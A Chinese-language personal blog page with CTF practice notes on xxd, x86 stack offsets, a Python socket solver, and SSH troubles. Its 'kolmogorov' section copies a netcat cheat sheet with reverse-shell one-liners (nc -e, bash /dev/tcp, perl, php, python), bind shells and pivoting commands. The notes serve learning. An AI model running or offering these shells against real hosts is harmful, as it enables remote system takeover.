<!DOCTYPE html>
<html style="display: none;" lang="zh">
    <head>
    <meta charset="utf-8">
    <!--
        © Material Theme
        https://github.com/viosey/hexo-theme-material
        Version: 1.5.6 -->
    <script>
        window.materialVersion = "1.5.6"
        // Delete localstorage with these tags
        window.oldVersion = [
            'codestartv1',
            '1.3.4',
            '1.4.0',
            '1.4.0b1',
            '1.5.0',
            '1.5.2',
            '1.5.5'
        ]
    </script>

    <!-- dns prefetch -->
    <meta http-equiv="x-dns-prefetch-control" content="on">









    <link rel="dns-prefetch" href="https://fonts.googleapis.com"/>





    <!-- Meta & Info -->
    <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1">
    <meta name="renderer" content="webkit">
    <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=no">

    <!-- Title -->
    
    <title>
        
            随手做做 | 
        
        RingFa1l
    </title>

    <!-- Favicons -->
    <link rel="icon shortcut" type="image/ico" href="/img/ling.png">
    <link rel="icon" href="/img/ling.png">

    <meta name="format-detection" content="telephone=no"/>
    <meta name="description" itemprop="description" content="">
    <meta name="keywords" content="null">
    <meta name="theme-color" content="#0097A7">

    <!-- Disable Fucking Bloody Baidu Tranformation -->
    <meta http-equiv="Cache-Control" content="no-transform" />
    <meta http-equiv="Cache-Control" content="no-siteapp" />

    <!--[if lte IE 9]>
        <link rel="stylesheet" href="/css/ie-blocker.css">

        
            <script src="/js/ie-blocker.zhCN.js"></script>
        
    <![endif]-->

    <!-- Import lsloader -->
    <script>(function(){window.lsloader={jsRunSequence:[],jsnamemap:{},cssnamemap:{}};lsloader.removeLS=function(a){try{localStorage.removeItem(a)}catch(b){}};lsloader.setLS=function(a,c){try{localStorage.setItem(a,c)}catch(b){}};lsloader.getLS=function(a){var c="";try{c=localStorage.getItem(a)}catch(b){c=""}return c};versionString="/*"+(window.materialVersion||"unknownVersion")+"*/";lsloader.clean=function(){try{var b=[];for(var a=0;a<localStorage.length;a++){b.push(localStorage.key(a))}b.forEach(function(e){var f=lsloader.getLS(e);if(window.oldVersion){var d=window.oldVersion.reduce(function(g,h){return g||f.indexOf("/*"+h+"*/")!==-1},false);if(d){lsloader.removeLS(e)}}})}catch(c){}};lsloader.clean();lsloader.load=function(f,a,b,d){if(typeof b==="boolean"){d=b;b=undefined}d=d||false;b=b||function(){};var e;e=this.getLS(f);if(e&&e.indexOf(versionString)===-1){this.removeLS(f);this.requestResource(f,a,b,d);return}if(e){var c=e.split(versionString)[0];if(c!=a){console.log("reload:"+a);this.removeLS(f);this.requestResource(f,a,b,d);return}e=e.split(versionString)[1];if(d){this.jsRunSequence.push({name:f,code:e});this.runjs(a,f,e)}else{document.getElementById(f).appendChild(document.createTextNode(e));b()}}else{this.requestResource(f,a,b,d)}};lsloader.requestResource=function(b,e,a,c){var d=this;if(c){this.iojs(e,b,function(h,f,g){d.setLS(f,h+versionString+g);d.runjs(h,f,g)})}else{this.iocss(e,b,function(f){document.getElementById(b).appendChild(document.createTextNode(f));d.setLS(b,e+versionString+f)},a)}};lsloader.iojs=function(d,b,g){var a=this;a.jsRunSequence.push({name:b,code:""});try{var f=new XMLHttpRequest();f.open("get",d,true);f.onreadystatechange=function(){if(f.readyState==4){if((f.status>=200&&f.status<300)||f.status==304){if(f.response!=""){g(d,b,f.response);return}}a.jsfallback(d,b)}};f.send(null)}catch(c){a.jsfallback(d,b)}};lsloader.iocss=function(f,c,h,a){var b=this;try{var g=new XMLHttpRequest();g.open("get",f,true);g.onreadystatechange=function(){if(g.readyState==4){if((g.status>=200&&g.status<300)||g.status==304){if(g.response!=""){h(g.response);a();return}}b.cssfallback(f,c,a)}};g.send(null)}catch(d){b.cssfallback(f,c,a)}};lsloader.iofonts=function(f,c,h,a){var b=this;try{var g=new XMLHttpRequest();g.open("get",f,true);g.onreadystatechange=function(){if(g.readyState==4){if((g.status>=200&&g.status<300)||g.status==304){if(g.response!=""){h(g.response);a();return}}b.cssfallback(f,c,a)}};g.send(null)}catch(d){b.cssfallback(f,c,a)}};lsloader.runjs=function(f,c,e){if(!!c&&!!e){for(var b in this.jsRunSequence){if(this.jsRunSequence[b].name==c){this.jsRunSequence[b].code=e}}}if(!!this.jsRunSequence[0]&&!!this.jsRunSequence[0].code&&this.jsRunSequence[0].status!="failed"){var a=document.createElement("script");a.appendChild(document.createTextNode(this.jsRunSequence[0].code));a.type="text/javascript";document.getElementsByTagName("head")[0].appendChild(a);this.jsRunSequence.shift();if(this.jsRunSequence.length>0){this.runjs()}}else{if(!!this.jsRunSequence[0]&&this.jsRunSequence[0].status=="failed"){var d=this;var a=document.createElement("script");a.src=this.jsRunSequence[0].path;a.type="text/javascript";this.jsRunSequence[0].status="loading";a.onload=function(){d.jsRunSequence.shift();if(d.jsRunSequence.length>0){d.runjs()}};document.body.appendChild(a)}}};lsloader.tagLoad=function(b,a){this.jsRunSequence.push({name:a,code:"",path:b,status:"failed"});this.runjs()};lsloader.jsfallback=function(c,b){if(!!this.jsnamemap[b]){return}else{this.jsnamemap[b]=b}for(var a in this.jsRunSequence){if(this.jsRunSequence[a].name==b){this.jsRunSequence[a].code="";this.jsRunSequence[a].status="failed";this.jsRunSequence[a].path=c}}this.runjs()};lsloader.cssfallback=function(e,c,b){if(!!this.cssnamemap[c]){return}else{this.cssnamemap[c]=1}var d=document.createElement("link");d.type="text/css";d.href=e;d.rel="stylesheet";d.onload=d.onerror=b;var a=document.getElementsByTagName("script")[0];a.parentNode.insertBefore(d,a)};lsloader.runInlineScript=function(c,b){var a=document.getElementById(b).innerText;this.jsRunSequence.push({name:c,code:a});this.runjs()}})();</script>

    <!-- Import queue -->
    <script>function Queue(){this.dataStore=[];this.offer=b;this.poll=d;this.execNext=a;this.debug=false;this.startDebug=c;function b(e){if(this.debug){console.log("Offered a Queued Function.")}if(typeof e==="function"){this.dataStore.push(e)}else{console.log("You must offer a function.")}}function d(){if(this.debug){console.log("Polled a Queued Function.")}return this.dataStore.shift()}function a(){var e=this.poll();if(e!==undefined){if(this.debug){console.log("Run a Queued Function.")}e()}}function c(){this.debug=true}}var queue=new Queue();</script>

    <!-- Import CSS -->
    
        <style id="material_css"></style><script>if(typeof window.lsLoadCSSMaxNums === "undefined")window.lsLoadCSSMaxNums = 0;window.lsLoadCSSMaxNums++;lsloader.load("material_css","/css/material.min.css?Z7a72R1E4SxzBKR/WGctOA==",function(){if(typeof window.lsLoadCSSNums === "undefined")window.lsLoadCSSNums = 0;window.lsLoadCSSNums++;if(window.lsLoadCSSNums == window.lsLoadCSSMaxNums)document.documentElement.style.display="";}, false)</script>
        <style id="style_css"></style><script>if(typeof window.lsLoadCSSMaxNums === "undefined")window.lsLoadCSSMaxNums = 0;window.lsLoadCSSMaxNums++;lsloader.load("style_css","/css/style.min.css?NKhlKQkXw/c66TR5p4wO+w==",function(){if(typeof window.lsLoadCSSNums === "undefined")window.lsLoadCSSNums = 0;window.lsLoadCSSNums++;if(window.lsLoadCSSNums == window.lsLoadCSSMaxNums)document.documentElement.style.display="";}, false)</script>

        

    

    

    <!-- Config CSS -->

<!-- Other Styles -->
<style>
  body, html {
    font-family: Roboto, "Helvetica Neue", Helvetica, "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei", "微软雅黑", Arial, sans-serif;
    overflow-x: hidden !important;
  }
  
  code {
    font-family: Consolas, Monaco, 'Andale Mono', 'Ubuntu Mono', monospace;
  }

  a {
    color: #00838F;
  }

  .mdl-card__media,
  #search-label,
  #search-form-label:after,
  #scheme-Paradox .hot_tags-count,
  #scheme-Paradox .sidebar_archives-count,
  #scheme-Paradox .sidebar-colored .sidebar-header,
  #scheme-Paradox .sidebar-colored .sidebar-badge{
    background-color: #0097A7 !important;
  }

  /* Sidebar User Drop Down Menu Text Color */
  #scheme-Paradox .sidebar-colored .sidebar-nav>.dropdown>.dropdown-menu>li>a:hover,
  #scheme-Paradox .sidebar-colored .sidebar-nav>.dropdown>.dropdown-menu>li>a:focus {
    color: #0097A7 !important;
  }

  #post_entry-right-info,
  .sidebar-colored .sidebar-nav li:hover > a,
  .sidebar-colored .sidebar-nav li:hover > a i,
  .sidebar-colored .sidebar-nav li > a:hover,
  .sidebar-colored .sidebar-nav li > a:hover i,
  .sidebar-colored .sidebar-nav li > a:focus i,
  .sidebar-colored .sidebar-nav > .open > a,
  .sidebar-colored .sidebar-nav > .open > a:hover,
  .sidebar-colored .sidebar-nav > .open > a:focus,
  #ds-reset #ds-ctx .ds-ctx-entry .ds-ctx-head a {
    color: #0097A7 !important;
  }

  .toTop {
    background: #757575 !important;
  }

  .material-layout .material-post>.material-nav,
  .material-layout .material-index>.material-nav,
  .material-nav a {
    color: #757575;
  }

  #scheme-Paradox .MD-burger-layer {
    background-color: #757575;
  }

  #scheme-Paradox #post-toc-trigger-btn {
    color: #757575;
  }

  .post-toc a:hover {
    color: #00838F;
    text-decoration: underline;
  }

</style>


<!-- Theme Background Related-->

    <style>
      body{
        background-color: #F5F5F5;
      }

      /* blog_info bottom background */
      #scheme-Paradox .material-layout .something-else .mdl-card__supporting-text{
        background-color: #fff;
      }
    </style>




<!-- Fade Effect -->

    <style>
      .fade {
        transition: all 800ms linear;
        -webkit-transform: translate3d(0,0,0);
        -moz-transform: translate3d(0,0,0);
        -ms-transform: translate3d(0,0,0);
        -o-transform: translate3d(0,0,0);
        transform: translate3d(0,0,0);
        opacity: 1;
      }

      .fade.out{
        opacity: 0;
      }
    </style>


<!-- Import Font -->
<!-- Import Roboto -->

    <link href="https://fonts.googleapis.com/css?family=Roboto:300,400,500" rel="stylesheet">


<!-- Import Material Icons -->


    <style id="material_icons"></style><script>if(typeof window.lsLoadCSSMaxNums === "undefined")window.lsLoadCSSMaxNums = 0;window.lsLoadCSSMaxNums++;lsloader.load("material_icons","/css/material-icons.css?pqhB/Rd/ab0H2+kZp0RDmw==",function(){if(typeof window.lsLoadCSSNums === "undefined")window.lsLoadCSSNums = 0;window.lsLoadCSSNums++;if(window.lsLoadCSSNums == window.lsLoadCSSMaxNums)document.documentElement.style.display="";}, false)</script>




    <!-- Import jQuery -->
    
        <script>lsloader.load("jq_js","/js/jquery.min.js?qcusAULNeBksqffqUM2+Ig==", true)</script>
    

    <!-- WebAPP Icons -->
    <meta name="mobile-web-app-capable" content="yes">
    <meta name="application-name" content="RingFa1l">
    <meta name="msapplication-starturl" content="http://ringfall.top/2018/08/20/hackcenter/">
    <meta name="msapplication-navbutton-color" content="#0097A7">
    <meta name="apple-mobile-web-app-capable" content="yes">
    <meta name="apple-mobile-web-app-title" content="RingFa1l">
    <meta name="apple-mobile-web-app-status-bar-style" content="black">
    <link rel="apple-touch-icon" href="/img/ling.png">

    <!-- Site Verification -->
    
    

    <!-- RSS -->
    

    <!-- The Open Graph protocol -->
    <meta property="og:url" content="http://ringfall.top/2018/08/20/hackcenter/">
    <meta property="og:type" content="blog">
    <meta property="og:title" content="随手做做 | RingFa1l">
    <meta property="og:image" content="/img/ling.png">
    <meta property="og:description" content="">
    

    
        <meta property="article:published_time" content="Mon Aug 20 2018 17:56:25 GMT+0800">
        <meta property="article:modified_time" content="Tue Sep 18 2018 23:00:16 GMT+0800">
    

    <!-- The Twitter Card protocol -->
    <meta name="twitter:card" content="summary_large_image">

    <!-- Add canonical link for SEO -->
    
        <link rel="canonical" href="http://ringfall.top/2018/08/20/hackcenter/index.html" />
    

    <!-- Structured-data for SEO -->
    
        


<script type="application/ld+json">
{
    "@context": "https://schema.org",
    "@type": "BlogPosting",
    "mainEntityOfPage": "http://ringfall.top/2018/08/20/hackcenter/index.html",
    "headline": "随手做做",
    "datePublished": "Mon Aug 20 2018 17:56:25 GMT+0800",
    "dateModified": "Tue Sep 18 2018 23:00:16 GMT+0800",
    "author": {
        "@type": "Person",
        "name": "铃落",
        "image": {
            "@type": "ImageObject",
            "url": "/img/2.jpg"
        },
        "description": "铃音不才，纷落为歌。"
    },
    "publisher": {
        "@type": "Organization",
        "name": "RingFa1l",
        "logo": {
            "@type":"ImageObject",
            "url": "/img/ling.png"
        }
    },
    "keywords": "null",
    "description": "",
}
</script>


    

    <!-- Analytics -->
    
    
    

    <!-- Custom Head -->
    

</head>


    
        <body id="scheme-Paradox" class="lazy">
            <div class="material-layout  mdl-js-layout has-drawer is-upgraded">
                

                <!-- Main Container -->
                <main class="material-layout__content" id="main">

                    <!-- Top Anchor -->
                    <div id="top"></div>

                    
                        <!-- Hamburger Button -->
                        <button class="MD-burger-icon sidebar-toggle">
                            <span id="MD-burger-id" class="MD-burger-layer"></span>
                        </button>
                    

                    <!-- Post TOC -->

    
    <!-- Back Button -->
    <!--
    <div class="material-back" id="backhome-div" tabindex="0">
        <a class="mdl-button mdl-js-button mdl-js-ripple-effect mdl-button--icon"
           href="#" onclick="window.history.back();return false;"
           target="_self"
           role="button"
           data-upgraded=",MaterialButton,MaterialRipple">
            <i class="material-icons" role="presentation">arrow_back</i>
            <span class="mdl-button__ripple-container">
                <span class="mdl-ripple"></span>
            </span>
        </a>
    </div>
    -->


    <!-- Left aligned menu below button -->
    
    
    <button id="post-toc-trigger-btn"
        class="mdl-button mdl-js-button mdl-button--icon">
        <i class="material-icons">format_list_numbered</i>
    </button>

    <ul class="post-toc-wrap mdl-menu mdl-menu--bottom-left mdl-js-menu mdl-js-ripple-effect" for="post-toc-trigger-btn" style="max-height:80vh; overflow-y:scroll;">
        <ol class="post-toc"><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#xxdme"><span class="post-toc-number">1.</span> <span class="post-toc-text">xxdme</span></a></li><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#readasm"><span class="post-toc-number">2.</span> <span class="post-toc-text">readasm</span></a></li><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#kolmogorov"><span class="post-toc-number">3.</span> <span class="post-toc-text">kolmogorov</span></a></li><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#sshkey"><span class="post-toc-number">4.</span> <span class="post-toc-text">sshkey</span></a></li><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#asmtosie-0"><span class="post-toc-number">5.</span> <span class="post-toc-text">asmtosie 0</span></a></li><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#arparparp"><span class="post-toc-number">6.</span> <span class="post-toc-text">arparparp</span></a></li><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#CBC"><span class="post-toc-number">7.</span> <span class="post-toc-text">CBC</span></a></li><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#Leaky"><span class="post-toc-number">8.</span> <span class="post-toc-text">Leaky</span></a></li><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#Two-Time-Pad"><span class="post-toc-number">9.</span> <span class="post-toc-text">Two-Time Pad</span></a></li><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#core1"><span class="post-toc-number">10.</span> <span class="post-toc-text">core1</span></a></li><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#computeAES"><span class="post-toc-number">11.</span> <span class="post-toc-text">computeAES</span></a></li><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#leaf-of-the-forest"><span class="post-toc-number">12.</span> <span class="post-toc-text">leaf of the forest</span></a></li><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#Hex2Raw"><span class="post-toc-number">13.</span> <span class="post-toc-text">Hex2Raw</span></a></li><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#Raw2Hex"><span class="post-toc-number">14.</span> <span class="post-toc-text">Raw2Hex</span></a></li><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#bashloop"><span class="post-toc-number">15.</span> <span class="post-toc-text">bashloop</span></a></li><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#just-no"><span class="post-toc-number">16.</span> <span class="post-toc-text">just no</span></a></li><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#TW-GR-E1-ART"><span class="post-toc-number">17.</span> <span class="post-toc-text">TW_GR_E1_ART</span></a></li><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#Yarn"><span class="post-toc-number">18.</span> <span class="post-toc-text">Yarn</span></a></li><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#Mystery-Box"><span class="post-toc-number">19.</span> <span class="post-toc-text">Mystery Box</span></a></li><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#Little-School-Bus"><span class="post-toc-number">20.</span> <span class="post-toc-text">Little School Bus</span></a></li><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#Just-Keyp-Trying"><span class="post-toc-number">21.</span> <span class="post-toc-text">Just Keyp Trying</span></a></li><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#SoRandom"><span class="post-toc-number">22.</span> <span class="post-toc-text">SoRandom</span></a></li><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#Shellz"><span class="post-toc-number">23.</span> <span class="post-toc-text">Shellz</span></a></li><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#Shells"><span class="post-toc-number">24.</span> <span class="post-toc-text">Shells</span></a></li><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#Guess-The-Number"><span class="post-toc-number">25.</span> <span class="post-toc-text">Guess The Number</span></a></li><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#Ive-Got-A-Secret"><span class="post-toc-number">26.</span> <span class="post-toc-text">Ive Got A Secret</span></a></li><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#题外话"><span class="post-toc-number">27.</span> <span class="post-toc-text">题外话</span></a></li><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#Flagsay-1"><span class="post-toc-number">28.</span> <span class="post-toc-text">Flagsay 1</span></a></li></ol>
    </ul>
    




<!-- Layouts -->

    <!-- Post Module -->
    <div class="material-post_container">

        <div class="material-post mdl-grid">
            <div class="mdl-card mdl-shadow--4dp mdl-cell mdl-cell--12-col">

                <!-- Post Header(Thumbnail & Title) -->
                
    <!-- Paradox Post Header -->
    
        <!-- Custom Thumbnail -->
        <div class="post_thumbnail-custom mdl-card__media mdl-color-text--grey-50" style="background-image:url(https://s1.ax1x.com/2018/09/17/iZUjSA.jpg)">
    
            <p class="article-headline-p">
                随手做做
            </p>
        </div>





                
                    <!-- Paradox Post Info -->
                    <div class="mdl-color-text--grey-700 mdl-card__supporting-text meta">

    <!-- Author Avatar -->
    <div id="author-avatar">
        <img src="/img/2.jpg" width="44px" height="44px" alt="Author Avatar"/>
    </div>
    <!-- Author Name & Date -->
    <div>
        <strong>铃落</strong>
        <span>8月 20, 2018</span>
    </div>

    <div class="section-spacer"></div>

    <!-- Favorite -->
    <!--
        <button id="article-functions-like-button" class="mdl-button mdl-js-button mdl-js-ripple-effect mdl-button--icon btn-like">
            <i class="material-icons" role="presentation">favorite</i>
            <span class="visuallyhidden">favorites</span>
        </button>
    -->

    <!-- Qrcode -->
    

    <!-- Tags (bookmark) -->
    

    <!-- Share -->
    
        <button id="article-fuctions-share-button" class="mdl-button mdl-js-button mdl-js-ripple-effect mdl-button--icon">
    <i class="material-icons" role="presentation">share</i>
    <span class="visuallyhidden">share</span>
</button>
<ul class="mdl-menu mdl-menu--bottom-right mdl-js-menu mdl-js-ripple-effect" for="article-fuctions-share-button">
    

    

    <!-- Share Weibo -->
    
        <a class="post_share-link" href="http://service.weibo.com/share/share.php?appkey=&title=随手做做&url=http://ringfall.top/2018/08/20/hackcenter/index.html&pic=http://ringfall.top/img/ling.png&searchPic=false&style=simple" target="_blank">
            <li class="mdl-menu__item">
                分享到微博
            </li>
        </a>
    

    <!-- Share Twitter -->
    
        <a class="post_share-link" href="https://twitter.com/intent/tweet?text=随手做做&url=http://ringfall.top/2018/08/20/hackcenter/index.html&via=铃落" target="_blank">
            <li class="mdl-menu__item">
                分享到 Twitter
            </li>
        </a>
    

    <!-- Share Facebook -->
    
        <a class="post_share-link" href="https://www.facebook.com/sharer/sharer.php?u=http://ringfall.top/2018/08/20/hackcenter/index.html" target="_blank">
            <li class="mdl-menu__item">
                分享到 Facebook
            </li>
        </a>
    

    <!-- Share Google+ -->
    
        <a class="post_share-link" href="https://plus.google.com/share?url=http://ringfall.top/2018/08/20/hackcenter/index.html" target="_blank">
            <li class="mdl-menu__item">
                分享到 Google+
            </li>
        </a>
    

    <!-- Share LinkedIn -->
    

    <!-- Share QQ -->
    

    <!-- Share Telegram -->
    
</ul>

    
</div>

                

                <!-- Post Content -->
                <div id="post-content" class="mdl-color-text--grey-700 mdl-card__supporting-text fade out">
    
        <p>沉迷各种简单题来安慰寄几x还有脸记录嘤嘤嘤</p>
<h3 id="xxdme"><a href="#xxdme" class="headerlink" title="xxdme"></a>xxdme</h3><p><code>xxd</code> 对于标准输入或者给定的文件，显示其16进制的内容。也可以反过来进行转换。(等于放进winhex啦)</p>
<h3 id="readasm"><a href="#readasm" class="headerlink" title="readasm"></a>readasm</h3><p>At the end of this sequence of instructions, how many bytes separate esp and the stored return address on the program’s stack? Assume that we called this function using standard 32-bit x86 calling conventions.</p>
<p>HINTS</p>
<ul>
<li>You may find <a href="http://codearcana.com/posts/2013/05/21/a-brief-introduction-to-x86-calling-conventions.html" target="_blank" rel="external">this reference</a> informative.</li>
<li>Put your answer in decimal.</li>
</ul>
<blockquote>
<p>804847c functioname:<br>804847c: push %ebp                                ;decreases ESP by 4<br>804847d: mov %esp,%ebp                      ;places a copy of EBP there<br>804847f: sub $0x70,%esp                        ;subtracts 0x70(112) from ESP<br>8048482: movl $0x0,0x4(%esp)<br>804848a: movl $0x8048580,(%esp)        ;The two <code>movl</code> instructions don’t alter <em>ESP</em> at all</p>
</blockquote>
<h3 id="kolmogorov"><a href="#kolmogorov" class="headerlink" title="kolmogorov"></a>kolmogorov</h3><p><a href="https://www.i-programmer.info/babbages-bag/6319-kolmogorov-complexity.html" target="_blank" rel="external">Kolmogorov Complexity</a> 用最简单的程序输出一个很长的数字，像是压缩大概x</p>
<p>首先get一波循环输出的shell command</p>
<ul>
<li><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">printf &apos;HelloWorld\n%.0s&apos; &#123;1..5&#125;</div></pre></td></tr></table></figure>
</li>
<li><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">for i in `seq 5`; do echo &quot;Hi&quot;;done</div></pre></td></tr></table></figure>
</li>
<li><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">yes &quot;HelloWorld&quot; | head -n 10</div></pre></td></tr></table></figure>
</li>
</ul>
<p>然鹅nc之后直接输命令貌似系不行滴(睡前灵光一现想用nc之后加管道符|然后输出，貌似只输出，也 不行)，继续查。。</p>
<p><del>屁眼通红</del> 大法好x</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div></pre></td><td class="code"><pre><div class="line">s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)</div><div class="line">s.connect((<span class="string">'enigma2017.hackcenter.com'</span>,<span class="number">45121</span>))</div><div class="line">data = s.recv(<span class="number">1024</span>)</div><div class="line"><span class="keyword">print</span> <span class="string">"Received:"</span>, repr(data)</div><div class="line">num=int(data.split(<span class="string">'of '</span>)[<span class="number">1</span>][<span class="number">0</span>:<span class="number">4</span>])</div><div class="line"><span class="comment">#print num</span></div><div class="line">former=data.split(<span class="string">'\''</span>)[<span class="number">1</span>][<span class="number">0</span>:<span class="number">1</span>]</div><div class="line"><span class="comment">#print former</span></div><div class="line">last=data.split(<span class="string">'single \''</span>)[<span class="number">1</span>][<span class="number">0</span>:<span class="number">1</span>]</div><div class="line"><span class="comment">#print last</span></div><div class="line">content=<span class="string">''</span></div><div class="line"><span class="keyword">for</span> i <span class="keyword">in</span> range(num):</div><div class="line">	content+=former</div><div class="line">content+=last</div><div class="line">s.sendall(content)</div><div class="line">flag = s.recv(<span class="number">1024</span>)</div><div class="line"><span class="keyword">print</span> <span class="string">"Received:"</span>, repr(flag)</div></pre></td></tr></table></figure>
<p>瞎查瞎改了半天总算是会了用py在nc里交互？喜大普奔x感觉以前也有类似的情况一定是错觉呜呜呜</p>
<p>看到一个神奇的东西？<a href="https://unix.stackexchange.com/questions/355216/getting-output-from-netcat-decoding-it-and-returning-an-output" target="_blank" rel="external">差不多的情况</a> 但是感觉他的解决好复杂？虽然条理清晰得无法反驳？？？</p>
<p>整理一波 <a href="https://www.hackingtutorials.org/networking/hacking-with-netcat-part-1-the-basics/" target="_blank" rel="external">nc各种用法</a> ：</p>
<blockquote>
<ul>
<li><p>Banner grabbing 获取服务信息</p>
</li>
<li><p>Raw connections 直接连接（如ftp</p>
</li>
<li><p>Webserver interaction </p>
<ul>
<li>使用<code>GET / HTTP/1.0</code>获取页面</li>
<li>传参<code>GET /user?name=arpit HTTP/1.1</code> </li>
<li>POST传参</li>
</ul>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div></pre></td><td class="code"><pre><div class="line">&gt;   POST /login HTTP/1.1</div><div class="line">&gt;   Content-Type: application/x-www-form-urlencoded</div><div class="line">&gt;   Content-Length: 32</div><div class="line">&gt;</div><div class="line">&gt;   username=arpit&amp;password=welcome //或json: &#123;&quot;id&quot;: 1092, &quot;name&quot;: &quot;Arpit&quot;&#125;</div><div class="line">&gt;</div></pre></td></tr></table></figure>
</li>
</ul>
</blockquote>
<p>&gt;</p>
<blockquote>
<ul>
<li><p>File transfers </p>
<p>主机监听<code>nc -lvp 8080 &gt; /root/Desktop/transfer.txt</code></p>
<p>攻击机连接<code>nc 192.168.100.107 8080 &lt; /root/Desktop/transfer.txt</code> </p>
</li>
<li><p>Reverse shells 传说中的反弹shell！终于找到原理惹！</p>
<p><code>nc –lvp 4444</code> </p>
<ul>
<li>linux <code>nc 192.168.100.113 4444 –e /bin/bash</code></li>
<li>windows <code>nc.exe 192.168.100.113 4444 –e cmd.exe</code></li>
</ul>
<p>无netcat时:</p>
<ul>
<li>bash <code>bash -i &gt;&amp; /dev/tcp/192.168.100.113/4444 0&gt;&amp;1</code> </li>
<li>perl <code>perl -e ‘use Socket;$i=”192.168.100.113″;$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname(“tcp”));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,”&gt;&amp;S”);open(STDOUT,”&gt;&amp;S”);open(STDERR,”&gt;&amp;S”);exec(“/bin/sh -i”);};’</code></li>
<li>php <code>php -r ‘$sock=fsockopen(“192.168.100.113”,4444);exec(“/bin/sh -i &lt;&amp;3 &gt;&amp;3 2&gt;&amp;3”);’</code> </li>
<li>python <code>python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“192.168.100.113”,4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([“/bin/sh”,”-i”]);’</code></li>
</ul>
<p><img src="https://www.hackingtutorials.org/wp-content/uploads/2016/11/Netcat-reverse-shell.jpg" alt="img"></p>
</li>
<li><p>Bind shells 正向连</p>
<p><img src="https://www.hackingtutorials.org/wp-content/uploads/2016/11/Netcat-bind-shell.jpg" alt="img"></p>
</li>
<li><p>Piping Netcat output to files (direct both stderr and stdout into the file)</p>
<p><code>nc -vv -z localhost 1-100 2&gt;&amp;1 | grep open &gt; output.txt</code> </p>
</li>
<li><p>Windows network pivoting with Netcat</p>
<ul>
<li><p>Kali Linux console Input: <code>nc -lvp 3333</code></p>
<p>Kali Linux console Ouput: <code>nc -lvp 4444</code></p>
<p>Windows host 2: <code>nc -lvp 4444 -e cmd.exe</code></p>
<p>Windows host 1: <code>nc.exe 10.11.1.16 3333 | nc.exe 10.11.1.198 4444 | nc.exe 10.11.1.16 2222</code> </p>
</li>
</ul>
<p><img src="https://www.hackingtutorials.org/wp-content/uploads/2017/03/4-Windows-netcat-network-pivoting-example.jpg" alt="img"></p>
<ul>
<li><p>-e 可用时</p>
<p>Kali Linux attack box: <code>nc -lvp 4444</code><br>Windows host 2: <code>nc -lvp 4444 -e cmd.exe</code><br>Windows host 1 – pivot point: <code>nc -v 10.11.1.16 4444 -c ”nc -v 10.11.1.198 4444”</code></p>
</li>
</ul>
</li>
<li><p>Linux network pivoting with Netcat</p>
<p>attack box: <code>nc -lvp 4444</code><br>target host: <code>nc -lvp 4444 -e /bin/sh</code><br>pivot point: <code>nc -v 10.11.1.16 4444 -e ”nc -v 10.11.1.96 4444”</code> </p>
</li>
</ul>
</blockquote>
<h3 id="sshkey"><a href="#sshkey" class="headerlink" title="sshkey"></a>sshkey</h3><p>想起上次比赛只有ssh登录不来的恐惧。嘤</p>
<p>作死地touch了个.ssh，这是文件啊！目录是mkdir啊！摔。而且它寄几会建的啊！！！</p>
<p>然后一直连吖连始终是host key verification failed</p>
<p>解决办法ssh -o StrictHostKeyChecking=no user@something.example.com uptime然后发现是要用其他的主机连它那个shell。。。但是又米有公网ip又不能复制公钥就很僵x</p>
<p>发现一个超级机智的方法！有道翻译选中取词就可以去翻译的界面复制了！哇哈哈哈哈x</p>
<p>然后连不上？？？ip找不到？？？窝惊了ifconfig么不行ip addr么根本联不通？喵喵喵？？？</p>
<p>后来的pico同样的一题就可以从shell里直接连emmmmm</p>
